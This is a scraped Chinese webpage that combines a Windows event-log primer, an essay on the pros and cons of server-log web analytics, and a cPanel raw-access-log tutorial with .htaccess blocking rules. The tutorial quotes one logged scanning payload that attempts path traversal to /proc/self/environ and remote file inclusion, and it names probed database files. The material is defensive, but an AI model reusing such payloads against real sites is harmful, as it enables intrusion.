查看teamtalk服务器布署日志,为什么总有一些IP访问我的网站中没有的页面?追溯IP是个叫team viewer

服务器日志是一个安全的、别人无法获取的日志文件,该文件记录了下所有的活动行为,包括用户与蜘蛛的访问信息,如:访问页面、IP信息、返回状态等。所以,服务器日志文件对于网站分析与优化都极具价值。&
同时,服务器系统日志是记载着服务器每时每刻的信息的一个数据库,上面记载着的一些信息对于我们了解服务器的运行状况都有很大的帮助。
查看方法:登陆服务器后进入控制面板—管理工具—事件查看器
日志按照内容被分为三类,双击每条日志即可查看详情。
应用程序:主要是记载服务器上面软件程序运行方面的一些事件。
安全性:主要是记载服务器用户登录的情况。
系统:主要是记载服务器系统程序运行状况。
下面分别举例介绍:
应用程序日志
这个事例记录的是用户数据库服务登陆失败的信息。
安全性日志
这是记载用户通过远程登陆服务器的日志,包括用户名以及登陆服务器时客户端的ip地址,当您怀疑服务器被人登陆时在这里可以查实。
这个日志记载了iis运行过程中的一个事件,当您的网站无法访问时在这里可以了解iis的工作状态。
以上只是各举了一个例子,更多的内容需要您在实际使用中总结。
服务器系统日志是记载着服务器每时每刻的信息的一个数据库,上面记载着的一些信息对于我们了解服务器的运行状况都有很大的帮助。
查看方法:登陆服务器后进入控制面板—管理工具—事件查看器
日志按照内容被分为三类,双击每条日志即可查看详情。
应用程序:主要是记载服务器上面软件程序运行方面的一些事件。
安全性:主要是记载服务器用户登录的情况。
系统:主要是记载服务器系统程序运行状况。
下面分别举例介绍:
应用程序日志
这个事例记录的是用户数据库服务登陆失败的信息。
安全性日志
这是记载用户通过远程登陆服务器的日志,包括用户名以及登陆服务器时客户端的ip地址,当您怀疑服务器被人登陆时在这里可以查实。
这个日志记载了iis运行过程中的一个事件,当您的网站无法访问时在这里可以了解iis的工作状态。
以上只是各举了一个例子,更多的内容需要您在实际使用中总结。
文章出自:森动网小鱼儿,转载请保留原文出处!
更多资源请查看:
¥0 5176人购买
¥100 3057人购买
¥498 260人购买
¥1699 115人购买
¥188 111人购买
¥1 1200人购买
¥69 735人购买
¥89 728人购买
¥1 608人购买
¥50 529人购买
¥5 515人购买
¥180 742人购买
¥299 68人购买
¥350 55人购买
¥288 18人购买
¥9888 10人购买
¥500 10人购买
最新优惠,最多折扣的优惠
价值:99 元&&&&仅售:&25
价值:1000 元&&&&仅售:&498
价值:505 元&&&&仅售:&39
价值:488 元&&&&仅售:&199
价值:128 元&&&&仅售:&35
微信扫描添加森动网微信公众平台
森动在线客服由Web日志确定页面访问时间的方法研究_图文_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
由Web日志确定页面访问时间的方法研究
上传于||文档简介
&&由​W​e​b​日​志​确​定​页​面​访​问​时​间​的​方​法​研​究
阅读已结束,如果下载本文需要使用1下载券
想免费下载本文?
下载文档到电脑,查找使用更方便
还剩2页未读,继续阅读
你可能喜欢服务器日志法网站分析的原理及优缺点
网站分析在中国——从基础到前沿
Sidney Song
网站分析在中国——从基础到前沿
  这篇文章是我接受九枝兰专访整理而成。
  导语:传统营销方式是粗放的,老大们&拍脑门&决策。但现在,营销越来越精细,一切都开始依靠数据驱动,数据成为企业一笔宝贵的财富。而互联网营销革命&&程序化营销的诞生进一步推升了数据管理平台(DMP)的重要性,DMP开始在中国数字营销圈迅速走红。如果企业合理使用DMP可以使触及到的目标受众更精准,可以提升转化率,降低推广成本。比如教育企业原来每做5000块钱的展示广告才能获得1个lead,但是运用DMP之后,成本可能会降低10%到20%。总之,优质的DMP平台可以让企业少花钱,多受益。那到底什么是DMP?企业应该如何科学应用DMP?企业建设DMP的需要投入哪些资源?九枝兰请来了国内负有盛誉的互联网营销专家宋星老师为我们一一解答。
网站分析经验分享
网站分析的逻辑模型,思维方法,实战经验和案例的分享。
网站分析圈子/活动
目前正在每月进行的活动是WAW(网站分析星期三)。此外,所有的网站分析和互联网广告和营销方面的活动也都会在这里通知。
网站分析产业有什么新鲜事?中国的网站分析发展到什么状况了?这是这个分类要关注的内容。
网站分析工具
想了解Google Analytics, Omniture以及其他网站分析工具、网络营销监测和分析工具吗?看这里!
这里有招聘信息,也有求职信息。也可以直接给我写信询问更多的工作机会和人才储备。招聘专用邮箱是:sxwuda(at)163(dot)com。
  应朋友们的要求,我还是写一篇关于服务器日志法进行网站分析的原理以及它的优缺点是什么。请朋友们注意,网站服务器日志法并不容易进行,初学者,以及在绝大多数情况下,进行以用户行为分析为核心的网站分析,用不到服务器日志法。不过,作为网站分析历史不可分割的一部分以及重要的基础篇章,服务器日志法仍然值得一书。下面的这篇文章也是我要撰写的书中截取的内容(我要快马加鞭快快写了,已经辜负了太多朋友的重托,抱歉抱歉!)。
  网站分析收集数据的方式其实有五、六种之多,我们最常见的有三种,分别是:服务器日志(Server Log)、页面标记(Page Tag)和客户端监测软件收集(Client End/Desktop)。我的CWA博客()中主要讲解的都是页面标记法,今天则跟大家讲解一下服务器日志方法的原理及优缺点。
1. 服务器日志是什么
  真正意义上的网站分析是从服务器日志开始的,而且直到今天,分析服务器(也称为server log file,或简称log file)日志仍然是网站分析的重要方法。
  这里的服务器指的是网站服务器(Web Server),而服务器日志跟飞机的黑匣子一样,是用来记录网站服务器的运行信息的,或者简单说,是用来记录服务器中的什么页面在什么时候被谁访问了。例如,如果你访问一次我的网站:,那么一般情况下,网站服务器的日志就会记录在某时某刻来自某个IP的访问者索引了网页&/index.php&。当然,网站服务器日志还会记录其他许多内容,这些内容能够帮助我们分析网站的流量和访问者在网站上的行为。
  下面这个图说明了网站日志是如何产生的。当用户访问一个网站的时候,事实上是访问这个网站的某一个具体的页面,我们假设这个页面叫Page 1。这时,我们的这个访问行为会请求服务器中Page 1的实际的文件,随之把这个文件下载到浏览器上。由于请求和下载行为都会引起服务器的响应和相应的行动,因此就有必要记录下服务器的这些行动。
  你会问,为什么需要记录服务器的行动呢?原因很简单,因为我们不想让这个服务器变成&哈尔9000&(哈尔9000是库布里克《2001太空奥德赛》里面有了自我意识的电脑,它直接威胁到了电影中的宇航员)啊!这当然只是开玩笑,不过目的并无差别,就是能够通过服务器日志,对服务器的运行历史进行记录,这样当有任何异常情况发生的时候,我们都能够通过日志探寻问题发生的原因&&跟记录飞机运行状态的黑匣子的作用十分类似。
  原理看起来并不复杂,不过log file实际上并不简单。为了让log file具有可读性,log file并不可以按照各个网站所有者的喜好随意记录的,而是有自己的规范。W3C组织定义了server log file的通用格式(如果你有兴趣,可以在这里看看这些格式都是如何定义的:),而其他一些组织或者个人又根据自己的需要额外扩展了这个格式,使log file能够比较全面地记录网站服务器进行的各种活动。
  一条标准的web server log记录通常包含如下信息:
l 远程主机(Remote Host)的IP地址/名字
l 登录名(Log Name)
l 登录全名(Full Name)
l 请求发生的日期(Date)
l 请求发生的时间(Time)
l 和标准格林威治时间的差值(GMT Offset)
l 请求的方法(Request Method)
l 请求的文件的地址(File)
l 请求遵守的协议(Protocol)
l 请求的状态(Status)
l 被请求文档的长度(Length)
  下面是一条标准的log file记录:
202.71.113.38 – – [03/Jan/:12 +0800] &GET /Chinawebanalytics/Sidney.htm HTTP/1.0& 200 5122
  从左到右,202.71.113.38就是远程主机的IP;而登录名和登录全名指的是发起这个请求的用户的名字,这个一般大家当然是不想要透露的了,所以远程主机会禁止给出这两个信息,log file当然就记录不下来了,用两个短中划线代替。然后,03/Jan/2010是请求发生的日期,01:56:12则是时间,之后的+0800是指比格林威治时间要晚8个小时,就是我们北京时间了。再之后的GET是请求的方法,另一种方法是POST,可以简单理解为GET就是索取,POST就是提交。接着:/Chinawebanalytics/Sidney.htm是被请求文件的地址,可以是绝对地址也可以是相对地址。HTTP/1.0是请求所遵守的协议,这里的协议是HTTP 1.0。整个记录的结尾是两个数字,其中200表示一种请求的状态,意思是请求一切正常。有时候这个数字会显示为404,相信大家一看到这个数字就头痛,它表示请求的文件无法找到(file not found);又有时候,这个数字会显示为301,表示页面被重新定向到了别的地址。最后的一个数字5593,表示所请求的文档的长度为5122 bytes。
  通用格式其实很简单,但是里面的这11类记录往往不足够帮助我们进行更深入的分析,因此其他的一些记录被加入进来,其中最重要的一些是:
l 请求来源(Referrer):指连接到被请求资源的网站的URL。如果请求时通过点击一个链接时发生,那么这个项目就会被记录;
l 客户端(User Agent):记录用户的浏览器或者发出请求的程序的相关信息;
l 所需时间(Time Taken):从请求的发出到请求的资源全部传输完毕所需花费的时间;
l Cookie。关于cookie的内容请大家看我的这篇文章:。
  看起来,网站服务器日志所记录的内容是很有限的,比起我们动辄上万行的编程实在是九牛一毛。但是,千万别认为网站服务器日志文件会很小,对于一些大网站,每分每秒都有很多访问者对网站服务器进行请求,所以日志文件会积少成多,成为巨型的数据文件。有时候,一个小时的记录就能超过数G。什么,你网站的服务器日志一个月才1M?要加油啊,没有人气的网站可没有生命力。
  讲到这儿,该说说历史了。网站分析就是从网站服务器日志开始的,或者更准确的说,网站服务器日志自诞生之日起,就是为网站分析所用的。最早,人们可是把所有的记录都拿出来,然后导入到数据软件中去进行分析,辛苦程度自不用说;但这个痛苦的阶段不会持续太久,哪儿有痛苦,哪儿就有生意,所以网站日志分析软件就出现了,解决了很大的问题,以至于大小互联网服务提供商(ISP)们都为租用他们空间的用户提供一款免费的网站日志分析软件。尽管如此,分析网站日志一直都是一个相当不容易的事情,所以,人们不得不寻找一些更便利的方法,这样便发明了网站分析的新的数据获取方法,这是后话了。
  如果你问我什么情况下选择用网站服务器日志来进行网站分析,我建议你如非必须,那么还是寻找一些更容易的方法能够事半功倍。看看后面的内容,你就能知道我为什么这么说。
2. 用网站服务器日志进行网站分析的优点
  尽管是个技术活,但是利用网站服务器日志进行网站分析还是有不少好处的。
1. 网站服务器的日志是被你完全掌控的数据。
  所谓放在自己手心最放心,这些日志在你的服务器中,如果不是黑客入侵,数据不可能被你不希望的人获取。而且,只要你不删除,它们永远都在那里,在任何时候你都可以回溯历史数据,无论这些数据有多么久远。有朝一日,你的网站大获成功,这些日志也是一份奋斗历史的见证。
2. 能够记录机器人/自动程序对网站的访问。
  其次,前面讲过,网站服务器的日志是记录网站服务器行为的,因此任何服务器响应的请求都会被记录下来。这些响应可能是应答用户发出的请求,也完全可能是应答一些互联网上自动程序发出的请求。最常见的一种互联网上的自动程序是搜索引擎的机器人,例如Google的Googlebot,这意味着网站服务器日志能够用来分析搜索引擎的访问,并帮助我们优化搜索引擎对网站的访问。讲到这里,请大家注意,并不是每一种网站分析方法都能做到这一点,我们最常用的为网站页面加入标签的方法是不能获取搜索引擎流量的。
3. 终端无关
  网站服务器的日志能够记录网站服务器全部响应行为的特点还延伸出另外一个优点,那就是无论是何种终端访问服务器,都能把相关数据记录下来。现在,能够访问网站的终端越来越多了,我无聊的时候也试着用Sony的PSP上网,用手机的GPRS也能轻松的浏览网页,这些形形色色的终端的访问,服务器日志都会忠实的记录,但页面加入标签的方法就可能完全行不通。
4. 能够探知文件是否完全下载
  日志方法的另一个好处是能够记录文件下载的情况。如果你在网上下载一个MP3音乐,你在发出这个响应的时候,日志会记录一个状态;你在下载完全的时候,日志照样会记录一个状态;如果你没有下载完全,日志还是会记录下来。这个,我想对那些提供下载服务的网站很有用。
5. 数据获取不依赖于第三方
  通过日志获取数据本身不需要额外的第三方的帮助。只要你的服务器在运转,日志就会源源不断的被创建、保存。不过,请注意,这里我所指的是数据的获取不需要额外的支持,但是数据的分析一般而言,还是需要第三方的帮助的。直接去用肉眼读日志文件中的数据进行分析是不可想象的。
6. 不怕防火墙
  最后,日志方法不惧怕防火墙或客户端安全软件的屏蔽,因为数据都是从服务器端获取的。
  看起来似乎不错,不过凡事有利有弊,日志方法也肯定有它不能克服的不足。
3. 用网站服务器日志方法进行网站分析的缺点
  日志方法能够起到作用的前提是服务器要响应来自客户端的请求,如果客户端的请求不通过服务器就得到了响应(这其实是经常发生的),那么服务器日志法就无能为力了。
1. 害怕网页缓存(Cache)
  为了提高网站页面的载入速度,人们发明了网页缓存(Cache)。在台湾,Cache被翻译作&快取&,似乎兼备了音义。
  网页缓存的原理很容易理解,但却是个了不起的发明。在缓存出现之前,人们访问网站每次都需要把网页从网站的服务器传输到客户端的浏览器中,这个速度当然会有点儿慢,尤其是网络条件不好的时候。于是善动脑筋的人们发现,每次访问的网站其实有很多内容是没有更新的,如果能够把那些不经常更新的部分放在自己的电脑里面,每次打开网页的时候,首先搜索自己电脑里面已经有的内容,然后再去服务器去寻找那些被更新了的部分,这样服务器传输的数据量就会大大减少了,整个网页也会被更快地显示出来。
  现在,我们大部分人的浏览器都设置了缓存。所以,有时候,你会发现,即使网络没有接通,你访问的网站似乎也能&正常&打开,只不过浏览器会显示&脱机&状态,告诉你,这些内容不是真正从服务器传输过来的。
  除了客户端(浏览器)能够存放缓存的内容外,代理服务器(Proxy)也能够存放网页缓存,目的同样是为了提速。你可以把代理服务器的缓存想象成CPU的&二级缓存&&&当客户端没有存储某个网页的缓存的时候(&一级缓存&没有内容),浏览器就会寻找代理服务器缓存,看看有没有内容。如果还没有,那才会再去寻找真正存放网页内容的网站服务器。
  有了缓存,当你点击浏览器的&回退按钮&的时候,回退的上一个页面就不需要再重新从服务器中下载一次,而是立即就呈现在你的面前。你常用的网站的打开速度也显著提升了。
  可是,对于通过服务器日志来获取网站访问数据的方法而言,这可不是一个好事情。由于缓存的存在,本来应该请求服务器的结果不需要请求了,服务器的日志什么也不会记录下来,可是对页面的访问却又实实在在的发生了。
  所以,缓存的存在会使日志方法低估网站的实际访问量。
2. 害怕Flash等&客户端交互&内容
  现在,为了更具冲击力的视觉效果和更丰富的网页互动,运用Flash、加入视频、设计很多互动程序在网页上已经稀疏平常。而这些元素,它们太独立了,以至于当它们被载入到浏览器端了之后,完全可以在浏览器端运行而不再与服务器发生交互,或者只需要在必要的时候才与服务器发生交互。
  比如,你玩儿普通网页版的Flash小游戏,一旦游戏下载完毕,你在玩儿的过程中跟网站服务器就不会有什么联系了,或者你看网页上的视频,你在播放器上进行的暂停操作,一般也不会跟服务器进行互动。还有,有一些脚本语言编写的网页程序,是在浏览器上被解释执行的,比如用JavaScript实现的网页Tab标签切换,在页面全部载完后,无论你怎么切换Tab,服务器都感觉不到了。
  服务器感觉不到,也就不会存在什么服务器日志记录,也就不会有数据,因此用日志方法是无法准确获取&客户端交互&类型的网站访问行为的。这种情况下,必须选择其他的数据收集方法。
3. 不精确的访问者记录
  日志方法辨别独立访问者需要依靠客户端的IP地址,也只能依靠它。不过,IP地址显然不代表真正的访问者。上班族的整个办公室的IP地址都可能是一个(使用代理服务器),而这个办公室可能坐着十多个人。这可能使访问者的数量被低估。
  同样,在家中,如果你购买了公共网络服务,那么你的IP地址存在动态分配的问题。你今天上网的IP地址和明天的可能就会不同,这个时候日志方法只能判断为两个不同的访问者。这又可能使访问者的数量被高估。
  此外,前面提到过日志是能够忠实记录机器(非人为)的访问活动的,但是机器不是人,它们的活动混在真实的人的访问之中,同样会使真实访问者的数量,或者访问数本身被高估。
  在这正反两相反方向的共同作用下,结果只能一个,那就是对于访问者数量的估算是非常模糊的。当然,我们必须要承认,无论用什么方法,网站访问者的精确数量都无法获得,但相对而言,日志方法要更不准确些。
4. 较弱的实时性
  没错,网站服务器日志是记录服务器运行的实时数据的,但是这些数据想要被取出分析,实时性就没有那么好了。常见的情况是,你必须首先把服务器日志文件(log file)从服务器中取出来,而这些文件肯定不会是服务器正在运行过程中的数据,一般都是隔天的(需要验证),然后再把这些日志文件导入到专门针对日志分析的工具中才能进行分析。这个过程的快慢依赖于你的熟练程度,但要追求实时,颇有难度。
  有技术高超的站长或者工程师通过架设内部网络、组建专门的日志分析服务器,并且编写特定的程序来解决日志分析的实时性问题(http://www.phparticle.net/htmldata/36462/1/),但是,对于普通的中小网站,这种方法难度颇大,花费不菲,所以可行性不强。因此,实时性是绝大部分通过日志方法来分析网站数据时要面对的问题。
5. 海量的数据存储
  服务器日志是忠实的,所以它会如实记录下来每一分每一秒发生的每一条服务器响应。对于一些流量稍大的网站,一天的网站日志记录超过数个G(Gigabytes)是非常正常的,而那些最大的网站,一个小时就可能产生数G的记录。我们没有詹姆斯&卡梅隆的超级团队(他的《阿凡达》特效需要处理超过500,000G的数据),所以如果要回溯网站一个月的流量就可能变成一个相当棘手的问题,需要投入相当的时间和耐心,如果你没有相当的技术和经验,效率就会很低。
6. 日志文件获取繁琐
  我们不能把日志文件的获取想象的太简单,毕竟这不是在自己卧室的电脑中点开一个MP3文件那么容易。有些网站有镜像服务器,有些服务器在境外,有些服务器是由处在多个不同地理位置的物理服务器逻辑组合而成。这些情况下,在进行日志分析之前需要集中所有的日志文件,这是一个很有些麻烦的事情,尤其是当日志文件的体积极为庞大的时候。另外,如果是租用的ISP服务器空间,如果没有权限获取日志数据,那么实际上连进行分析的可能性都没有了。
  现在,你完全了解了日志方法收集网站分析数据的优缺点,那么,什么情况下你应该选择这种方法进行网站分析呢?
4. 什么情况下该用日志分析方法
  如果你有如下的数据监测和分析的需要,你应该用日志分析方法:
1. 需要了解搜索引擎机器人或者其他非人为访问流量,并且希望据此对网站进行针对性的优化,如通过分析搜索引擎的访问行为来进行SEO;
2. 需要了解除了普通的PC客户端之外的上网设备对网站的访问情况;
3. 需要了解网站的文件资源是否被用户完整的下载索取;
4. 对网站流量信息具有极高的保密需要,不允许让任何第三方染指或帮忙;
5. 对于网站服务器的安全性和可维护性有要求,以及有非常显著的反抗黑客或其他非授权访问需求的。
  如果有如下需求,你不应该用日志分析方法:
1. 你的网站有重要的Flash之类的&非网页类型的互动&,用户和这些内容的互动是你想要了解的内容;
2. 不喜欢麻烦,对大数据量文件的处理不擅长,对日志文件不熟悉,没有好的日志数据处理软硬件资源;
3. 需要更精确的了解网站被真正的人访问的情况,而不需要了解&非人&的机器对网站的访问并且不希望受到网页缓存的干扰;
4. 需要更好的实时性、更规律更直观的数据呈现。
  现在,拿着这个清单,你可以做出容易的选择了。因为我的博客()的流量很多来自搜索引擎,因此分析服务器日志并了解搜索引擎爬虫的工作其实是非常必要的一个分析工作之一。
  就我的经验而言,我们国家使用日志来分析网站仍然占有相当的比例,尤其是对于一些大型网站,他们会开发专门的软件,划拨专门的硬件资源来分析网站日志。不过,这不仅仅是从分析访问者行为的角度来考虑,更是从网站服务器的安全性和可维护性角度来考虑的。
  不过,如果你把网站分析的重心放在对于网站真实访问者行为的追踪和分析上,那么,通过日志方法来实现相对而言难度相对比较大,操作也比较繁琐,我们可以利用另一种方法,即页面标记法(Page Tag)来实现对网站访问数据的收集。
[版权归(宋星)所有,欢 迎转载,但请事先告知作者并注明出处]
  好了,介绍完了,希望大家觉得看完后还算愉快!现在是大家的时间了,请您留言,任何问题,想法,不确切之处,都非常欢迎!谢谢!
Tags: , , ,
如果对比一下各种较出名的日志分析软件的性价比就更好了,:)
12&包括引用 &
最近的帖子虚拟主机cPanel面板查看服务器的访问日志
作者:佚名
字体:[ ] 来源:互联网 时间:06-26 13:21:59
如果你的博客或网站是搭建在付费主机上,如果你是博客或网站的管理员,如果你连原始访问日志(Raw Access Log)是什么都不知道,或者对其根本不屑一顾,我只能说你是一个不称职的网站管理员,一旦网站出问题,必定是束手无策!
相信大家都在自己的网站上安装了网站统计的代码,如Google analytics、量子统计、百度统计、cnzz、51.la等,这些工具可以统计网站的流量,也就是网站上访客可看到的所有页面的访问量,但是这些统计工具都不能统计你主机上资源的原始访问信息,例如某个图片被谁下载了。
绝大多数收费主机都提供原始访问日志(Raw Access Log),网站服务器会把每一个访客来访时的一些信息自动记录下来,保存在原始访问日志文件中,如果你的主机不提供日志功能,建议你到期后还是换主机吧。日志中记录了网站上所有资源的访问信息,包括图片、CSS、JS、FLASH、HTML、MP3等所有网页打开过程载入的资源,同时记录了这些资源都被谁访问了、用什么来访问以及访问的结果是什么等等,可以说原始访问日志记录了主机的所有资源使用情况。
如果你的网站遭到了攻击、非法盗链和不良请求等,通过分析原始访问日志能大概分析出端倪来,例如:今年年初我往我的主机上传了一个mp3,不幸被百度mp3收录,引来大量的盗链,导致我的主机流量猛增,虽然这对我并无大碍,但是心里不爽!通过分析日志,我找出了问题根源,删除了那个mp3,主机流量也降下来了。
不同主机使用的面板不太一样,所以查看原始访问日志的方法也不太一样,但是日志记录的格式都是一样的,具体查看原始访问日志的方法请咨询相关主机客服。下面是cPanel面板,通过点击红色方框中的按钮,接着选择你的网站域名,即可下载原始访问日志,使用文本编辑器打开即可查看:
原始访问日志每一行就是类似以下的记录:
64.10.90.61 - - [04/Mar/:26 -0600] &GET /intro.htm HTTP/1.1& 200 13947 &/& &Mozilla/4.0 ( MSIE 5.0; Windows 98; DigExt)&
下面我们来说说这一行记录的意思:
64.10.90.61
这是访客(也可能是机器人)的IP
[04/Mar/:26 -0600]
这是访客访问该资源的时间(Date),-0600是该时间所对应的时区,即与格林威治时间相差-6个小时
GET /intro.htm HTTP/1.1
请求信息,包括请求方式、所请求的资源以及所使用的协议,该语句的意思就是以GET方式,按照HTTP/1.1协议获取网页/intro.htm,intro.htm为网站上的某个网页。
200为该请求返回的状态码(Http Code),不同的状态码代表不同的意思,具体请阅读 HTTP 状态代码;13947为此次请求所耗费的流量(Size in Bytes),单位为byte
为访客来源(Referer)。这一段是告诉我们访客是从哪里来到这一个网页。有可能是你的网站其他页,有可能是来自搜索引擎的搜索页等。通过这条来源信息,你可以揪出盗链者的网页。
Mozilla/4.0 ( MSIE 5.0; Windows 98; DigExt)
为访客所使用的浏览器类型(Agent),这里记录了用户使用的操作系统、浏览器型号等
看了以上说明,可能你也大概知道每一行记录到底记录了一些什么东西,可以开始独立分析你的网站原始访问日志了,但是叫你直接看这些杂乱的日志,相信你会很抓狂,不愿意干。cPanle面板中的&Latest Visitors&提供一种格式化后日志查看方式,看起来比较舒服一些:
上图中Host: 218.17.120.205 为访客的IP,可看出该访客在当前时间段发起了三个请求,对应原始访问日志中的3行记录,红色标出的部分为访客请求的资源(也就是访客流量的网页等),其他部分参见以上说明。&Latest Visitors&中只能显示最近300个IP的访问信息,这里我写了一个原始访问日志的格式化工具,可将原始访问日志格式化成上图所示格式,方便阅读,工具地址:http://ludou.co.tv/logreader/
以上介绍了如何查看原始访问日志,现在我们来谈谈如何分析日志中的内容:
1、注意那些被频繁访问的资源
如果在日志中,你发现某个资源(网页、图片和mp3等)被人频繁访问,那你应该注意该资源被用于何处了!如果这些请求的来源(Referer)不是你的网站或者为空,且状态码(Http Code)为200,说明你的这些资源很可能被人盗链了,通过 Referer 你可以查出盗链者的网址,这可能就是你的网站流量暴增的原因,你应该做好防盗链了。请看下图,我网站上的japan.mp3这个文件就被人频繁的访问了,下图还只是日志的一部分,这人极其险恶,由于我早已将该文件删除,它迟迟要不到japan.mp3,在短短一个小时内对japan.mp3发起了不下百次的请求,见我设置了防盗链就伪造来源Referer和Agent,还不断地更换IP,很可惜它做得都是无用功,根本没有这个文件,请求的状态码Http Code都是403或者404
2、注意那些你网站上不存在资源的请求
例如下图的4个请求信息。/admin/editor/db/kmoxewebeditor.mdb等几个资源都是不是本站的资源,所以Http Code不是403就是404,但从名称分析,可能是保存数据库信息的文件,如果这些信息让别人拿走,那么攻击你的网站就轻松多了。发起这些请求的目的无非就是扫描你的网站漏洞,通过漫无目的地扫描下载这些已知的漏洞文件,很可能会发现你的网站某个漏洞哦!通过观察,可以发现,这些请求所使用的Agent差不多都是Mozilla/4.0、Mozilla/5.0或者libwww-perl/等等非常规的浏览器类型,以上我提供的日志格式化工具已经集成了对这些请求的警报功能。我们可以通过禁止这些Agent的访问,来达到防止被扫描的目的,具体方法下面再介绍。
常见的扫描式攻击还包括传递恶意参数等:
//header.php?repertoire=../../../../../../../../../../../../../../../proc/self/environ%00&/?_SERVERDOCUMENT_ROOT=http://wdwinfo.ca/logs/.log?
3、观察搜索引擎蜘蛛的来访情况
通过观察日志中的信息,你可以看出你的网站被蜘蛛访问的频率,进而可以看出你的网站是否被搜索引擎青睐,这些都是SEO所关心的问题吧。日志格式化工具已经集成了对搜索引擎蜘蛛的提示功能。常见搜索引擎的蜘蛛所使用的Agent列表如下:
Google蜘蛛
Mozilla/5.0 ( Googlebot/2.1; +/bot.html)
Baiduspider+(+/search/spider.htm)
Yahoo!蜘蛛
Mozilla/5.0 ( Yahoo! Slurp/3.0; /help/us/ysearch/slurp)
Yahoo!中国蜘蛛
Mozilla/5.0 ( Yahoo! Slurp C .cn/help.html)
微软Bing蜘蛛
msnbot/2.0b (+/msnbot.htm)
Google Adsense蜘蛛
Mediapartners-Google
Mozilla/5.0 ( YoudaoBot/1.0; /help/webmaster/spider/; )
Soso搜搜博客蜘蛛
Sosoblogspider+(+/soso-blog-spider.htm)
Sogou搜狗蜘蛛
Sogou web spider/4.0(+/docs/help/webmasters.htm#07)
Twiceler爬虫程序
Mozilla/5.0 (Twiceler-0.9 /twiceler/robot.html)&
Google图片搜索蜘蛛
Googlebot-Image/1.0
俄罗斯Yandex搜索引擎蜘蛛
Yandex/1.01.001 ( Win16; I)
ia_archiver (+/site/help/ )
Feedsky蜘蛛
Mozilla 5.0 ( Feedsky crawler /1.0; )
韩国Yeti蜘蛛
Yeti/1.0 (NHN Corp.; /robots/)
4、观察访客行为
通过查看格式化后的日志,可以查看跟踪某个IP在某个时间段的一系列访问行为,单个IP的访问记录越多,说明你的网站PV高,用户粘性好;如果单个IP的访问记录希希,你应该考虑如何将你的网站内容做得更加吸引人了。通过分析访客的行为,可以为你的网站建设提供有力的参考,哪些内容好,哪些内容不好,确定网站的发展方向;通过分析访客的行为,看看他们都干了些什么事,可以揣测访客的用意,及时揪出恶意用户。
以上只是我个人总结出来的一些小技巧,可以简单的分析你的日志内容,毕竟我个人见识还是比较短浅,还不能全面地进行日志分析。在cPanel主机控制面板中,还提供了awstats和webalizer两个日志分析工具,它们都是以原始访问日志为基础进行分析,功能强大且丰富,你可以一试,不懂的可以咨询主机客服。
上面说了如何分析你的日志,下面我们来讲讲如何御敌于前千里之外。我们这里以Linux主机的.htaccess编写为例来讲解如何防范恶意请求。
1、封杀某个IP
如果你不想让某个IP来访问你的网站,可以将其封杀。封杀防范有二:其一,在cPanel面板中有个Security & IP Deny Manager,点击进去填上要封杀的IP即可;其二,在.htaccess中加入以下语句,即可封杀这两个IP 123.165.54.14、123.165.54.15,以及123.165.55这个IP段,多个同理:
deny from 123.165.54.14deny from 123.165.54.15deny from 123.165.55
2、封杀某个浏览器类型(Agent)
通常情况下,如果是使用机器人来扫描或者恶意下载你的网站资源,它们使用的Agent差不多都是一个类型,例如我上面所说的Mozilla/4.0、Mozilla/5.0或者libwww-perl/等。你可以封杀某个Agent,来达到防范攻击的目的。在.htaccess中添加以下规则:
SetEnvIfNoCase User-Agent &.*Firefox/3\.6\.3.*& bad_agent
&Limit GET POST&Order Allow,DenyAllow from allDeny from env=bad_agent&/Limit&
以上规则封杀了Agent中含有Firefox/3.6.3的来源,也就是包括以下例子的Agent将无法访问你的网站:
Agent: Mozilla/5.0 (W U; Windows NT 5.1; zh-CN; rv:1.9.2.3) Gecko/ Firefox/3.6.3
以上只是个例子,切不可用于你的网站,否则使用Firefox 3.6.3的用户就不可以访问你的网站了,访问结果Http Code都是403,他们看到都是403页面,也就是禁止访问页面。这里让我来教你如何编写封杀的规则,以上语句SetEnvIfNoCase User-Agent &.*Firefox/3\.6\.3.*& bad_agent指定了要封杀的规则,核心语句 &.*Firefox/3\.6\.3.*& 用于匹配含有 Firefox/3.6.3 的来源,写法见正则表达式的写法,这里给出几个正则例子,你可以套用:
&&通过上表,你差不多也知道了个大概,在正则式子中,所有点 . 一概写成 \. ; ^用于匹配开头, $用于匹配结尾;.* 用于匹配任意长度的字符(包括长度为0的),下面是一个完整例子,你可以套用,相信你也可以写出自己的规则:
## Block Bad Bots by user-AgentSetEnvIfNoCase User-Agent &^libwww-perl& bad_agentSetEnvIfNoCase User-Agent &^Mozilla/4\.0$& bad_agentSetEnvIfNoCase User-Agent &^Mozilla/5\.0$& bad_agentSetEnvIfNoCase User-Agent &^$& bad_bot
&Limit GET POST&Order Allow,DenyAllow from allDeny from env=bad_bot&/Limit&
3、封杀某个来源(Referer)
如果某个网站频繁地对你网站进行盗链,且不听劝,那你可以通过禁止它的Referer,来达到防盗链目的,下面举个例子来禁止这个网站对你网站的盗链,正则的编写跟上面的无异,在.htaccess中添加以下规则:
SetEnvIf Referer &^http://www\.google\.com& bad_referer
&filesmatch &\.(jpg|gif|png|css|js|bmp|mp3|wma|swf)&&Order Allow,DenyAllow from allDeny from env=bad_referer&/filesmatch&
通过对来源(Referer)的判断,使用以下代码可以达到简单的防盗链。以下列出的网址,允许访问你网站上后缀名为jpg|gif|png|css|js|bmp|mp3|wma|swf的文件,其余网站全部禁止访问这些文件,正则的写法与上面说的相同,你可以将其中的域名稍作更改,然后应用于你的网站,在.htaccess中添加以下规则:
SetEnvIf Referer &^http://www\.ludou\.org/& local_refererSetEnvIf Referer &^http://cache\.baidu\.com/& local_referer
# 将以下语句中的 # 去除,即可允许Referer为空的请求,一般设置允许为好# SetEnvIf Referer &^$& local_referer
&filesmatch &\.(jpg|gif|png|css|js|bmp|mp3|wma|swf)&&&Order Deny,Allow&Deny from all&Allow from env=local_referer&/filesmatch&
5、文件重命名
即使你网站上的资源被人盗链了,通过文件重命名,同样可以达到防盗链的目的,毕竟盗链者不知道你改了文件名,它也不会整天监视你的文件。
不管怎么说,有防的就有攻,攻防永远都是一对冤家,这样的拉锯永远都不会终止。以上介绍的方法只能达到简单防范的目的,如果有人有意要攻击你的网站,那点东西起不了太大作用,我们只能根据敌手出的招,见招拆招才能免于不测,这样的能力,还需各位站长慢慢学习积累,毕竟做个网站也不是那么简单的。
原文地址:http://www.ludou.org/learning-how-to-analyse-raw-access-log.html
大家感兴趣的内容
12345678910
最近更新的内容

我要回帖

更多关于 teamtalk服务器布署 的文章

 

随机推荐